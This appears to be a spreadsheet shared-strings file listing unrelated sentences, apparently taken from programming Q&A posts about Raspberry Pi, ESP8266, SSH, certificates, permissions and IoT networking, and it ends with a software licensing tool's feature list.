  <si>
    <t>Other Way is expose your computer as a server:
you can get more details here: hosting in pc</t>
  </si>
  <si>
    <t>I know what a bitmask is, so I want to enable the right bit for the pin.</t>
  </si>
  <si>
    <t>And please do answer the question with proper codes.</t>
  </si>
  <si>
    <t>The safe shutdown works properly.</t>
  </si>
  <si>
    <t>My first suspicion would be the certificate - if your certificate includes your IP address, clearly your browser will be upset that the IP in the certificate is not the IP you're connecting to.</t>
  </si>
  <si>
    <t>Could you bypass/hack by running silence in the background.</t>
  </si>
  <si>
    <t>The 0x800 (the value of O_NONBLOCK) in that file status value indicates that nonblocking mode is active.</t>
  </si>
  <si>
    <t>Replace permissions 0222 to 0220, so compilation will succeed.</t>
  </si>
  <si>
    <t>First, add the word "authoritative", which indicates this is the authoritative DHCP on the network.</t>
  </si>
  <si>
    <t>-p = port standard port for ssh was 22.</t>
  </si>
  <si>
    <t>Applications accessing the KeyChain normally go through these steps:
Receive a callback from an X509KeyManager that a private key is requested.</t>
  </si>
  <si>
    <t>Find Security Bugs (or "find-sec-bugs") is a SpotBugs plugin for security audits of Java web applications.</t>
  </si>
  <si>
    <t>The only way to guarantee type safety and substitutability is to be equally or more liberal than A on inputs, and to be equally or more strict than A on outputs.</t>
  </si>
  <si>
    <t>Also, check to see if a reserved word was used as an alias.</t>
  </si>
  <si>
    <t>Anyone Expert in Arduino please suggest me to debug code.</t>
  </si>
  <si>
    <t>Our security specialist however refused to validate the proof of posession.</t>
  </si>
  <si>
    <t>I did not find server certificate verification failed.</t>
  </si>
  <si>
    <t>Currently, this connection isn't secure.</t>
  </si>
  <si>
    <t xml:space="preserve">
This is the code for receiving SMSes from the cellular network.</t>
  </si>
  <si>
    <t>also encrypt from the Arduino and send to PHP.</t>
  </si>
  <si>
    <t>Here is the code
I used Serial only as debug echo.</t>
  </si>
  <si>
    <t>But then my raspberry froze (can't connect via ssh, apache didnt respond either).</t>
  </si>
  <si>
    <t>I am trying to create a WiFi connection between a raspberry pi and an android device.</t>
  </si>
  <si>
    <t>So I get sent the WAN IP, and not our secured VPN IP.</t>
  </si>
  <si>
    <t>In contrast to the v2 API uploads now also use HTTPS connections.</t>
  </si>
  <si>
    <t>I have an security cam which sends the video stream over 2,4 GHz to a receiver.</t>
  </si>
  <si>
    <t>Problem  - nginx does not log any access - and I can't get out to the internet on 80 port.</t>
  </si>
  <si>
    <t>But most BLE modules do not have Rx/Ts pins for transparent interaction.</t>
  </si>
  <si>
    <t>The wifi network the I am trying to connect does not have internet access.</t>
  </si>
  <si>
    <t>Does anyone knows how to disable the pins?</t>
  </si>
  <si>
    <t>Currently, I can use Putty to connect to the RPi using the COM port 3 (asks for a user id/password) and gives me a shell (ttyAMA0).</t>
  </si>
  <si>
    <t>A solution might be sftp (it works), but I don't want to use the ssh port for that.</t>
  </si>
  <si>
    <t>I'm currently working on uploading sensor data to Google Spreadsheet through Intel Galileo board.</t>
  </si>
  <si>
    <t>Only I'm not really getting any valid data back.</t>
  </si>
  <si>
    <t>But what I didn't realise is my code still uses the localhost to log into the MySQL database.</t>
  </si>
  <si>
    <t>begin(Ssid, Password) function to connect to a network.</t>
  </si>
  <si>
    <t>By the way, our IT department does not permit my ESP8266 be registered to the Proxy Wifi Connection.</t>
  </si>
  <si>
    <t>It stays frozen until the system is reset by the watchdog.</t>
  </si>
  <si>
    <t>On the SQL side I've tried SQL/Mixed authentication, new logins, and configuring remote access through TCP, but I've had no luck.</t>
  </si>
  <si>
    <t>When I registered my Raspberry Pi as a Device and a Gateway, I gave both connections the same Device ID.</t>
  </si>
  <si>
    <t>I am using Raspberry Pi 3, python 2.7 and gspread to send to google drive API where the info is logged in google docs.</t>
  </si>
  <si>
    <t>Is it possible, in iOS, to connect to a BLE device using a known MAC Address (so I can skip the discovery stage)?</t>
  </si>
  <si>
    <t>This data needs to be logged for a period of 500-20000ms.</t>
  </si>
  <si>
    <t>It has a static IP-address in the 192.168.xxx.xxx network that I know, and is secured by WPA2-PSK.</t>
  </si>
  <si>
    <t>Why do I not get a valid ip address once connected?</t>
  </si>
  <si>
    <t>Also I will
  try to use HTTPS to secure this connection.</t>
  </si>
  <si>
    <t>I am working on a project to send song from my HACKRF ONE.</t>
  </si>
  <si>
    <t>If not, I want to know is there is anyway to communicate with Infrared sensors and decode the infrared signal.</t>
  </si>
  <si>
    <t>I need it to run automatically and if there's no SSH connection run autobackup.sh , but if there is an SSH connection, not to run anything.</t>
  </si>
  <si>
    <t>If not,  how can I get secure websocket working?</t>
  </si>
  <si>
    <t>I try to connect in ssh with pxssh in python, I have the following error password refused.</t>
  </si>
  <si>
    <t>Code uploading was successful.</t>
  </si>
  <si>
    <t>For example, I've sent Security request to ECU, CAN frame data will look like this
How does ECU determine that this is not just a chunk of data but a part of the protocol?</t>
  </si>
  <si>
    <t>I'm an newbie to build a secure connection between python server and raspberry pi.</t>
  </si>
  <si>
    <t>Am I required to add a username, or is TCPClient different from telnet?</t>
  </si>
  <si>
    <t>I'm using NodeMCU to use ESP8266 and I want to use ipify to get public IP address.</t>
  </si>
  <si>
    <t>I imagine this is a permissions error with lambda.</t>
  </si>
  <si>
    <t>I am getting "java.security.UnrecoverableKeyException:no match" in getTempKeystore method in AWSIotKeystoreHelper class.</t>
  </si>
  <si>
    <t>Questions:
1- How i can tell if the login was successful?</t>
  </si>
  <si>
    <t>This module usually sends in the adversiment data:
Is there a way to customize in Service Data with id B000 using arduino?</t>
  </si>
  <si>
    <t>The hci is setup with no security so the PC connecting to it automatically pairs - this all works.</t>
  </si>
  <si>
    <t>The program only runs if I startup the SSH connection.</t>
  </si>
  <si>
    <t>How can I make sure dotnet has enough permissions to access the gpio's?</t>
  </si>
  <si>
    <t>I also want to send a password (AUTH) key from the web app to the file on my rpi.</t>
  </si>
  <si>
    <t>Here, i print my device information.</t>
  </si>
  <si>
    <t>Its using insecure connection to connect .</t>
  </si>
  <si>
    <t>I have kind of confusion about BLE secure connection.</t>
  </si>
  <si>
    <t>I have a website hosted on my raspberry pi 3
I have a domain name which points to my ip on port 80 and I have also got a certificate(.key file) provided by the vendor.</t>
  </si>
  <si>
    <t>Currently a device is connected through eth0 ,  says it has some IP but pinging the hostname of the device gets no reply.</t>
  </si>
  <si>
    <t>Moreover I don't want to come up with something that is hacky or might break later.</t>
  </si>
  <si>
    <t>Instead of this part, i would like to have an algoritm to autofind the ip address of Raspberry Pi via Mac Adress or Device Name.</t>
  </si>
  <si>
    <t>I have been closely following the examples provided on bitbucket and was able to detect my device and filter out it's MAC address by filtering it by name.</t>
  </si>
  <si>
    <t>I try to create an Android app that sends a key to an Arduino NFC Shield.</t>
  </si>
  <si>
    <t>For example sending sms to assign password and ssid for WiFi Manager.</t>
  </si>
  <si>
    <t>the best you can use in arduino is xxtea encryption.</t>
  </si>
  <si>
    <t>The 'serial' permission is missing from the manifest.json :</t>
  </si>
  <si>
    <t>Serial access is interesting.</t>
  </si>
  <si>
    <t>You can try to log in as root and disable the infinite loop for your user's shell.</t>
  </si>
  <si>
    <t>2) Once your SSH session is closed all processes go with it.</t>
  </si>
  <si>
    <t>If for instance you wanted to access the address 0x01AB, then set highADDR to 0x01 and lowADDR to 0xAB.</t>
  </si>
  <si>
    <t>Just on a side note, what are your concerns about the ssh connection?</t>
  </si>
  <si>
    <t>If you want to ssh to your pi from your computer, just connect to your pi's internal ip address.</t>
  </si>
  <si>
    <t>Don't close hwrngFile before generating the key.</t>
  </si>
  <si>
    <t>This is for ultrasonic sensor.</t>
  </si>
  <si>
    <t>First login to OpenWrt is different: telnet as root with no password until you set it.</t>
  </si>
  <si>
    <t>It is not possible as your device may get an IP address from the ISP dynamically.</t>
  </si>
  <si>
    <t>I assume you should useStructureNotifyMask as the mask to get the XDestroyWindowEvent event.</t>
  </si>
  <si>
    <t>Ron,
You may try logging into the device via telnet and running 'getmac' or 'ipconfig /all'.</t>
  </si>
  <si>
    <t>I needed to proxy the websockets as well.</t>
  </si>
  <si>
    <t>Second, you would need to find out what the scan code is for those keys.</t>
  </si>
  <si>
    <t>or X-Cache-Lookup would mean that you are connected through a proxy.</t>
  </si>
  <si>
    <t>SSH) without Internet Connection.</t>
  </si>
  <si>
    <t>You cannot use it share connection or login to RPI.</t>
  </si>
  <si>
    <t>Check  (or whatever) permissions when running script from your server.</t>
  </si>
  <si>
    <t>Of course, if you are using a WiFi shield, this example won't work.</t>
  </si>
  <si>
    <t>You would need to do it from the same IP, that your ESP8266 will be introduced to the server, since the cookie is IP bound.</t>
  </si>
  <si>
    <t>Get your current IP address for eth0 with ifconfig.</t>
  </si>
  <si>
    <t>That hostname can be used to identify the IP address of the Raspberry Pi from Java code dynamically.</t>
  </si>
  <si>
    <t>Once you've logged in, it will look like it's hung, but it's not; it just doesn't have any output to show you.</t>
  </si>
  <si>
    <t>The following data will be masked.</t>
  </si>
  <si>
    <t>Try wifi protected setup (WPS) in Google.</t>
  </si>
  <si>
    <t>This output, however:
ERROR: The certificate of bootstrap.pypa.io is not trusted.</t>
  </si>
  <si>
    <t>You encrypt the first value, save the output.</t>
  </si>
  <si>
    <t>You also have no public IPv6 address.</t>
  </si>
  <si>
    <t>There are APIs which can be used to setup Wi-Fi networks programmatically.</t>
  </si>
  <si>
    <t>The receiver will then remove the carrier and only output the coded pulses.</t>
  </si>
  <si>
    <t>Azure IoT Hub use DigiCert Baltimore Root certificate to secure device connection.</t>
  </si>
  <si>
    <t>Connected to a different network and i got the ack from the server for valid key and certificate !</t>
  </si>
  <si>
    <t>Your problem is that you need a Python file to send the barcode to the PHP script.</t>
  </si>
  <si>
    <t>After you have modified, restart your server 
 sudo service mysql restart
Please create a user which can be from any host.</t>
  </si>
  <si>
    <t>If it is the latter, then you'll need to send the cookie data.</t>
  </si>
  <si>
    <t>Then you can access your ESP through the browser and your public IP address.</t>
  </si>
  <si>
    <t>As soon as you let go of a key the bot should stop.</t>
  </si>
  <si>
    <t>You can see how to do it here: How to make a ssh connection with python?</t>
  </si>
  <si>
    <t>So be sure that you upload your codes before connection.</t>
  </si>
  <si>
    <t>So yes you can running a background service and do whatever you want.</t>
  </si>
  <si>
    <t>I worked on a jailbroken app which used BTStack to communicate with a serial device.</t>
  </si>
  <si>
    <t>The omnibox API allows you to register a keyword with Google Chrome's address bar, which is also known as the omnibox.</t>
  </si>
  <si>
    <t>Mt.Gox is an established Bitcoin exchange.</t>
  </si>
  <si>
    <t>A Captive Network is generally a Wifi one.</t>
  </si>
  <si>
    <t>User verification by email or SMS</t>
  </si>
  <si>
    <t>Facebook Hacker Cup is an international programming competition hosted and administered by Facebook.</t>
  </si>
  <si>
    <t>Android class providing access to the system alarm services.</t>
  </si>
  <si>
    <t>An attacker who interposes himself in the middle of a connection.</t>
  </si>
  <si>
    <t>Its very much possible that this data being transferred can be sniffed.</t>
  </si>
  <si>
    <t>It has support for IMAP, POP3, and SMTP email protocols.</t>
  </si>
  <si>
    <t>When cerutil is run on a non-certification authority, the command defaults to running the certutil -dump verb.</t>
  </si>
  <si>
    <t>This is the same as pointers in C.
Invalid combination of opcode and operands error on mov [msg], [ebp+8]?</t>
  </si>
  <si>
    <t>SMTP connections secured by SSL are known by the shorthand SMTPS, though SMTPS is not a protocol in its own right.</t>
  </si>
  <si>
    <t>Warning: Stylish has turned into malware!</t>
  </si>
  <si>
    <t>It can be used by jsch to optionally compress SSH connections.</t>
  </si>
  <si>
    <t>No data is sent without the user's consent.</t>
  </si>
  <si>
    <t>Specifically created as a default connection point for SimpleWebRTC.js
It also supports vending STUN/TURN servers with the shared secret mechanism as described in this draft.</t>
  </si>
  <si>
    <t>It's not the OS's login password nor any standard PIN you might expect (eg 0000 or 1234).</t>
  </si>
  <si>
    <t>2018-06-04 17:12:59:994 IoTSampleSwift[4999:2464150]
  GetCredentialsForIdentity failed.</t>
  </si>
  <si>
    <t>You can also decode those ids back.</t>
  </si>
  <si>
    <t>And
Invalid device : Network is down 
I even tried turning on the hci0 , but nothing seems to be working.</t>
  </si>
  <si>
    <t>The debugging session is done through SSH to a raspberry pi.</t>
  </si>
  <si>
    <t>With sender authentication turned on, it always says invalid login even though the same login works for IMAP and POP.</t>
  </si>
  <si>
    <t>So the device must be ok and properly connected.</t>
  </si>
  <si>
    <t>Which Fingerprint SDK do you use ?</t>
  </si>
  <si>
    <t>Did you check your devices in your network?</t>
  </si>
  <si>
    <t>Use  for check permission.</t>
  </si>
  <si>
    <t>Navigate to  and run ./broker.sh
./iot-server.sh &amp; 
./analytics.sh
Then you can login to the console from - https://localhost:9443/devicemgt</t>
  </si>
  <si>
    <t>Check FILE PERMISSIONS.</t>
  </si>
  <si>
    <t>Available data from bus is loaded into circular buffer, and brute force method finds valid messages in buffer.</t>
  </si>
  <si>
    <t>Here is my last try:
I may also need some help on how to register the BroadcastReceiver, currently I'm doing this inside of the Activity's :
this.registerReceiver(this.myWifiReceiver, new IntentFilter(ConnectivityManager.CONNECTIVITY_ACTION));
And in onPause:
this.unregisterReceiver(myWifiReceiver);
EDIT:
Thanks to Devunwired's answer I've achieved what I wanted, I'm posting the code for future reference.</t>
  </si>
  <si>
    <t>The line in particular causing the issue is:
{host_name} of course is the actual host name it's connecting to, but I've left that part out for privacy reasons.</t>
  </si>
  <si>
    <t>I found a great and simple npm tool to detect internet connection.</t>
  </si>
  <si>
    <t>Due to its simplicity, Morse code can be sent by various means including: wired telegraphy, lights/mirrors, radio (or wireless telegraphy), and audio.</t>
  </si>
  <si>
    <t>If you want to get started with IBM Blockchain on Bluemix, you can create a free kubernetes cluster using the instructions found here.</t>
  </si>
  <si>
    <t>RPi 3 has a RPi Noir Camera v2 and serves as a Baby Monitor which is accessible via its private IP address within the network.</t>
  </si>
  <si>
    <t>I noticed that my data sent to PHP code (which have code to submit data to MySQL - tested and ran flawlessly), can't get through.</t>
  </si>
  <si>
    <t>Trying to open a connection to a remote server, but specifying the incorrect login details.</t>
  </si>
  <si>
    <t>The IP address assignments are ALWAYS done by the GSM network that the GPRS module is registered to and they cannot be known or fixed in advance.</t>
  </si>
  <si>
    <t>Here is serial monitor show...
What is the difference between CWJAP and CWSAP
I think CWSAP is to create and change the id and password for ESP8266 wifi and it also does not work.</t>
  </si>
  <si>
    <t>I have built a home surveillance and alarm system with raspberry pi's.</t>
  </si>
  <si>
    <t>You can use a SSH client such as Chilkat.Ssh or Asmodat.Standard.SSH.NET in UWP app to connect to the Raspbian, and then send the shutdown/reboot command( e.g.)</t>
  </si>
  <si>
    <t>So far all I've found and tried is:
github: server certificate verification failed - Seems the most promising.</t>
  </si>
  <si>
    <t>So even when using the same AppKey for all devices, chances should be low that they would also have generated the same DevNonce.</t>
  </si>
  <si>
    <t>Edit #2
I found some non blocking pyaudio code at this link.</t>
  </si>
  <si>
    <t>The idea is that the user will just press down on a pedal that will hit a button on the Arduino, and this would be the equivalent of hitting the ALT+TAB key (thereby allowing you to stealthily switch windows).</t>
  </si>
  <si>
    <t>Of course with the 3G connection, I have no public IP and I cannot do any NAT to access my raspberry directly.</t>
  </si>
  <si>
    <t>I will add that I know that the certificates we are using are good, otherwise there would be no success ever.</t>
  </si>
  <si>
    <t>SetUp Wifi method:
Attribute:
GetDateTime:</t>
  </si>
  <si>
    <t>My code so far is as follows
Obviously I haven't put in my password, "Raspberry", anywhere in the above code to authenticate the SSH connection.</t>
  </si>
  <si>
    <t>After the setup I try to login with both users, but directly after the login I get logged out again.</t>
  </si>
  <si>
    <t>Does it mean that anyone who knows the domain name or ip address can insert into the database and therefore alter the data?</t>
  </si>
  <si>
    <t>her, hvor vi verificerer dataen
{
    if (debug_ == HIGH)
    {
        cout &lt;&lt; "[+] Verification success!"</t>
  </si>
  <si>
    <t>Is the memory address not valid?</t>
  </si>
  <si>
    <t>The following code is associated to bluetooth connection.</t>
  </si>
  <si>
    <t>Its connected to the internet by some unknown means, this can be through Wifi, ethernet or GSM/3G.</t>
  </si>
  <si>
    <t>I removed the ip and mac address for privacy reasons.</t>
  </si>
  <si>
    <t>First, I've been trying to connect to google.com (secured) to give it a try, but with no success either.</t>
  </si>
  <si>
    <t>Everything works fine but it seems like the sensor doesn't fit securely in the breadboard.</t>
  </si>
  <si>
    <t>I have a simple web server, which waiting for JSON with SSID and password where device must connect.</t>
  </si>
  <si>
    <t>I am not sure if my problem is with the Android code or some bad network configuration on the ESP.</t>
  </si>
  <si>
    <t>I set up node-red &amp; Watson IoT Platform with Blockchain extension enabled &amp; connected.</t>
  </si>
  <si>
    <t>Out of the box, when I plug the USB key, RPi0 can access to internet and resolve addresses.</t>
  </si>
  <si>
    <t>I am getting errors connecting to the gsm module
Here's the code I got from rhydolabz
Here are the errors:
Sometimes It sends
Hello User
Login incorrect
raspberrypi login:
Sometimes
&gt;
&gt;
&gt; 
(100+ more '&gt;')
Hello User
but almost always it doesn't connect and it gives Error 11
Have you experience this too?</t>
  </si>
  <si>
    <t>When trying to connect using Bluetooothctl or Bluetooth manager a Pass Key is generated in both the devices and getting connected then within a few seconds it gets disconnected.</t>
  </si>
  <si>
    <t>Now is the tricky part, to my RPi i have an Eth connection connected to an RX/TX device.</t>
  </si>
  <si>
    <t>Thired is Automatically created mask in R-Pi.</t>
  </si>
  <si>
    <t>So i'm trying to create a C# code to communicate to a serial device that is conected to my PC.</t>
  </si>
  <si>
    <t>Once they are connected their details are save in JSON file.</t>
  </si>
  <si>
    <t>I'm trying to store an SSID and password that the user sends through a post request in the flash EEPROM section.</t>
  </si>
  <si>
    <t>It would be better if I coded the communication myself but I'm ok with working library, thanks
This protocol uses DevEUI AppEUI and AppKey</t>
  </si>
  <si>
    <t>I have been using a dynamic dns server for this access my site via username:password@mysite:80/file.php.</t>
  </si>
  <si>
    <t>My questions are
Can I still communicate with devices that use SMBus ver 1.1. without knowing their addresses or baudrates?</t>
  </si>
  <si>
    <t>im following a guide on how to make a doorlock that works on wifi via Feather-huzzah and a 3.3V ftdi programmer connected to a ARduino-uno and a servo.</t>
  </si>
  <si>
    <t>Questions:
1- in UART driver (mxs-auart.c) in the kernel, how can I detect which device is being accessed?</t>
  </si>
  <si>
    <t>The choice of algorithm only has to be made once a protocol has been established.</t>
  </si>
  <si>
    <t>I had the same issue a while back it was because Apache does not have permission to access certain devices on the Pi.</t>
  </si>
  <si>
    <t>However, it should be sufficient to send only IAC DONT ECHO, the password, CR NUL, then IAC DO ECHO.</t>
  </si>
  <si>
    <t>Without root you may not be able to stop the process.</t>
  </si>
  <si>
    <t>There are two ways to run applications with the ability to be terminated by control-C:
Run applications over an SSH connection from a PC.</t>
  </si>
  <si>
    <t>As a result, you would need to have and maintain a network connection.</t>
  </si>
  <si>
    <t>Yeah based on this photo
you're not grounding your sensor.</t>
  </si>
  <si>
    <t>The SL address of the Xbee is unique and than you can say if there is unknown node on your network.</t>
  </si>
  <si>
    <t>Forward port 22 (SSH) in your router to the internal IP address you chose.</t>
  </si>
  <si>
    <t>You need to setup access to GPIO on Raspberry PI otherwise it will only be accessible for root.</t>
  </si>
  <si>
    <t>Additionally using such a program could make a system unstable or malfunction.</t>
  </si>
  <si>
    <t>Note that bossac has to be run as root (sudo) if you want it to detect your usb port (/dev/ACM0).</t>
  </si>
  <si>
    <t>What comes into my mind is to use an ultrasonic sensor.</t>
  </si>
  <si>
    <t>in linux maybe you have to run the program as sudo
it may have something to do with your privileges over the port also.</t>
  </si>
  <si>
    <t>Closed upvalues
 leaks because the callback parameter shouldn't be conn but something else instead.</t>
  </si>
  <si>
    <t>that your Arduino(s) connect to over port 1883, and then connects them securely over port 8883 over the internet.</t>
  </si>
  <si>
    <t>I have never tried doing this, but I believe your proxy system would work, if you disable the DHCP on your router, and use the raspberry pi as the DHCP server for the system.</t>
  </si>
  <si>
    <t>You didn't share any code so I can't advise further, but consider using the BearSSL::WiFiClientSecure class for your connection.</t>
  </si>
  <si>
    <t>Secured Connection (for Internet Tranfers)</t>
  </si>
  <si>
    <t>megaupload.com was a file hosting service running bewteen 2005 and 2012, until it was famously shutdown by the United States Department of Justice.</t>
  </si>
  <si>
    <t>The data is deleted when the user closes the browser window.</t>
  </si>
  <si>
    <t>Tag addresses the AWS certificate Manager ACM.</t>
  </si>
  <si>
    <t>Gmail provide a pop service where users can get access to their email.</t>
  </si>
  <si>
    <t>Apple's documentation can be found at Security Framework.</t>
  </si>
  <si>
    <t>Even faster batch verification.</t>
  </si>
  <si>
    <t>Analyze device data and trigger alarms.</t>
  </si>
  <si>
    <t>GDPR is the EU general data protection regulation which begins enforcement on May 25 2018.</t>
  </si>
  <si>
    <t>An attacker can use XSS to send a malicious script to an unsuspecting user.</t>
  </si>
  <si>
    <t xml:space="preserve"> class provides access to the system alarm services.</t>
  </si>
  <si>
    <t>At the expense of this, a reliable system for transmitting and receiving data must be implemented.</t>
  </si>
  <si>
    <t>What I need help with:
Can I get the Wifi to secure a connection before XWindows fires?</t>
  </si>
  <si>
    <t>Information on the watchdog timer is in Section 21.14 in this document.</t>
  </si>
  <si>
    <t>If they all have the same keycode, I think distinguishing between these different keys would be much more difficult.</t>
  </si>
  <si>
    <t>You'll need to find its fingerprint yourself.</t>
  </si>
  <si>
    <t>Maybe you need to check the user you log in.</t>
  </si>
  <si>
    <t>However, in our case, we don't want to generate certificates like this.</t>
  </si>
  <si>
    <t>I've just set up Raspberry Pi and I am trying to login using SSH, but it fails with .</t>
  </si>
  <si>
    <t>I have surfed over the internet to access a VPN but failed.</t>
  </si>
  <si>
    <t>The codes can be found here.</t>
  </si>
  <si>
    <t>I'm starting the app with sudo so it shouldn't be permissions and 81 works too.</t>
  </si>
  <si>
    <t>How to enable SSH in this case ?</t>
  </si>
  <si>
    <t>Anybody know a work around for scanning for WiFi Network using a Windows IoT Background App (task)?</t>
  </si>
  <si>
    <t>You should check the makefile and verify.</t>
  </si>
  <si>
    <t>You have to check the permissions.</t>
  </si>
  <si>
    <t>You should do an ls -l /dev and check the I/O device you are trying to access.</t>
  </si>
  <si>
    <t>In your case just provide -funsigned-char when invoking the compiler.</t>
  </si>
  <si>
    <t>You sure you haven't checked these codes?</t>
  </si>
  <si>
    <t>Does your apache user have permissions to start fswebcam?</t>
  </si>
  <si>
    <t>You need to authenticate AES 128, it's seem difficult to me.</t>
  </si>
  <si>
    <t>When a privileged user tries to scan targets on a local ethernet network, ARP requests are used unless --send-ip was specified.</t>
  </si>
  <si>
    <t>If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special "Not found" indication is returned.</t>
  </si>
  <si>
    <t>Explanation from here:
http://www.raspberrypi.org/forums/viewtopic.php?f=29&amp;t=22515
To open /dev/mem you need both regular access permissions on the device file and the security capability CAP_SYS_RAWIO, or to be root.</t>
  </si>
  <si>
    <t>However, when I go to my hub's namespace and click on Shared access policies, I see this:
The list of Permissions do not include a 'Send' permission.</t>
  </si>
  <si>
    <t>&lt;&lt; endl;
    }
    return convertRecData(store);
}
else
{
    if (debug_ != LOW)
    {
        cout &lt;&lt; "[-] Verification failed."</t>
  </si>
  <si>
    <t>But is there a way to do a backup of current firmware binary using WiFi?</t>
  </si>
  <si>
    <t>Other than the above two, you could always use the ESP8266's "SmartConfig" mode, which allows you to set the password without association to an access point via a mobile app.</t>
  </si>
  <si>
    <t>As described here also:
https://dev.mysql.com/doc/refman/8.0/en/linux-installation-yum-repo.html
A superuser account 'root'@'localhost is created.</t>
  </si>
  <si>
    <t>Verbosity is the amount of information that is logged or printed to the user console.</t>
  </si>
  <si>
    <t>The file is
  created on the server host, so you
  must have the FILE privilege to use
  this syntax.</t>
  </si>
  <si>
    <t>without sudo - it says:
/home/pi/scripts/wiringPi/gpio/gpio: Must be root to run.</t>
  </si>
  <si>
    <t>I have registered the Windows Developer Program for IoT and received the Intel Galileo board from Microsoft.</t>
  </si>
  <si>
    <t>I can run rpcapd in null authentication mode and access the interfaces from my windows machine using wireshark and it works perfect.</t>
  </si>
  <si>
    <t>Additionally, it isn't even shown in the device manager as "unknown device" as e.g.</t>
  </si>
  <si>
    <t>dmesg output:
CIFS VFS: Unable to select appropriate authentication method!</t>
  </si>
  <si>
    <t>You cannot (and should not) attempt to run your app process as the root user via su.</t>
  </si>
  <si>
    <t>J5 needs access to ports on your computer which the browser (for security reasons) does not allow.</t>
  </si>
  <si>
    <t>There is a list of device addresses in the Microchip data sheet DS21732C on the page 20.</t>
  </si>
  <si>
    <t>Verbosity is the amount of information that is logged or printed to console.</t>
  </si>
  <si>
    <t>In Git, every commit has two author fields, "user name" and "email".</t>
  </si>
  <si>
    <t>You can also use the server SDK to protect your back-end resources.</t>
  </si>
  <si>
    <t>For further data analysis we also want to send that data to a central server, so we've added a Wifi shield.</t>
  </si>
  <si>
    <t>I am trying to get a script to work where a button is monitored and if operated once then turn on something.</t>
  </si>
  <si>
    <t>Hello i have a project to implement fingerprint attendance system for my college.</t>
  </si>
  <si>
    <t>Optional safe mode can sanitize HTML output (great for user entered content).</t>
  </si>
  <si>
    <t>How can I find out the new authentication key?</t>
  </si>
  <si>
    <t>I start this script over ssh on two different raspberrys (Vers.</t>
  </si>
  <si>
    <t>When I use my raspberry pi to connect to the database it says authentication failed.</t>
  </si>
  <si>
    <t>I have found this code able to decrypt a LoRaWAN packet.</t>
  </si>
  <si>
    <t>How do I do to get HTTPS fingerprint using Linux CLI, for use on my code?</t>
  </si>
  <si>
    <t>And for my case, ESP8266 will not have SSID and Password before smartConfig.</t>
  </si>
  <si>
    <t>However, pyzbar still fails to decode it on the Raspberry Pi.</t>
  </si>
  <si>
    <t>Please check the permissions of  file.</t>
  </si>
  <si>
    <t>by using getpwuid if getlogin fails:</t>
  </si>
  <si>
    <t>Just found out that I should be using IoT Hub Device Identities in bulk - https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-bulk-identity-mgmt.</t>
  </si>
  <si>
    <t>Perhaps check also that the accessKeyId etc.</t>
  </si>
  <si>
    <t>I found an example using ssh keys or this SO answser.</t>
  </si>
  <si>
    <t>This can occur if the version of FirebaseArduino has an outdated fingerprint.</t>
  </si>
  <si>
    <t>JAAS is the Java Authentication and Authorization Service found in the JRE (1.4+).</t>
  </si>
  <si>
    <t>SPV wallets can sync with the blockchain in seconds, even from a cold
start.</t>
  </si>
  <si>
    <t>Check out the Office 365 OAuth Sandbox.</t>
  </si>
  <si>
    <t>You can validate HTML5 inputs as well as custom Vue components.</t>
  </si>
  <si>
    <t>After verification, you will receive the full amount of API calls under your plan.</t>
  </si>
  <si>
    <t>It enables auditing and establishes accountability for users with access to privileged account credentials.</t>
  </si>
  <si>
    <t>Firebase (Google servers) will handle the rest by pushing notifications to all the registered devices.</t>
  </si>
  <si>
    <t>It should be noted that other devices are able to connect to the WiFi in question, and using any corporate network is not possible the project.</t>
  </si>
  <si>
    <t>Within an HTML document, normally a connection to an anonymous ftp site would be made.</t>
  </si>
  <si>
    <t>Pressure to make e-mail spam illegal has been successful in some jurisdictions, but less so in others.</t>
  </si>
  <si>
    <t>This fingerprint may
  be used for data deduplication purposes.</t>
  </si>
  <si>
    <t>You can also find a version of RenewCert code on MSDN.</t>
  </si>
  <si>
    <t>I noted that you are using Linux, please check that ACM0 has the rights user permissions.</t>
  </si>
  <si>
    <t>In such a way, a monitor protects the shareable resources used by it being manipulated by other waiting threads at the same instant of time.</t>
  </si>
  <si>
    <t>token expected unqualified-id before '.'</t>
  </si>
  <si>
    <t>My opinion, is that your bug is the DNS server that is unreachable, as there's no DNS resolver opened on 4.4.4.4.</t>
  </si>
  <si>
    <t>Now when I turn it on I cannot access it.</t>
  </si>
  <si>
    <t>When I went to access it from a network that was not my LAN, I found that I could not.</t>
  </si>
  <si>
    <t>In this case, we need to import our user identity to the iOS keychain.</t>
  </si>
  <si>
    <t>When using ssh and configuring the keys properly, I get the same error.</t>
  </si>
  <si>
    <t>I did check other php codes and they work.</t>
  </si>
  <si>
    <t>Bytes 5 and 6 are the encoder status.</t>
  </si>
  <si>
    <t>Would you like to tell me how to check JWT authentication?</t>
  </si>
  <si>
    <t>iOS will ask you input passcode.</t>
  </si>
  <si>
    <t>You might get help at Scan Codes Demystified and USB IDs.</t>
  </si>
  <si>
    <t>[Full disclosure: I jumbled some of the UUID numbers above since I'm not sure if any of this information is private or hackable or whatever] 
[By the way, the nRF8001 BLE Shield will not do this since it only runs in peripheral mode.]</t>
  </si>
  <si>
    <t>input your VNC server password and you've now got GUI access to do what you want.</t>
  </si>
  <si>
    <t>Start the Raspberry Pi with a keyboard and a monitor connected and login with user pi.</t>
  </si>
  <si>
    <t>You can try using fingerprinting for better accuracy.</t>
  </si>
  <si>
    <t>Turns out, 32 kB is less than 17 kB + 5 kB - for clientSecure and server respectively.</t>
  </si>
  <si>
    <t>CVE-2014-9390 is an  arbitrary command execution vulnerability on case-insensitive file systems .</t>
  </si>
  <si>
    <t>Usually wcf-authentication is found along with wfc, so you may use it too, if needed.</t>
  </si>
  <si>
    <t>License files can be also stored as embedded resource in assemblies
Add custom license data to the license file (allows flexible license shema, modular licensing...)
Limit usage of the license files themselves to extend trial periods, accomplish subscription/time based license expiration...
Validate/Activate license files via your own License Server
Comprehensive license management
Manage your Products, Customers, Sales
License Tracker to track down license generations/requests
ASP.NET management interface generation - Manage your data on a ASP.NET server
Embedded database - No requirement for special databases (MS SQL, Oracle... )
Software development kit
100% managed SDK libraries
Integrate license checking into your assembly and extend licensing fuctionality
IntelliLock automatically merges the main SDK library (IntelliLock.Licensing.dll) with your assembly
Create license files - Automate license file generation
Generate Hardware IDs
Extend licensing functions
Deactivate/Reactivate license files (via license server or reactivation code)
Use your own dialog box to show messages
Helper class to encrypt/decrypt, sign/validate data to support custom licensing algorithms
License management classes to manage your data on a ASP.NET server (data is stored using an embedded database)
Declarative Obfuscation support
Military-Grade strong license encryption using transparent encryption techniques (strong RSA encryption)
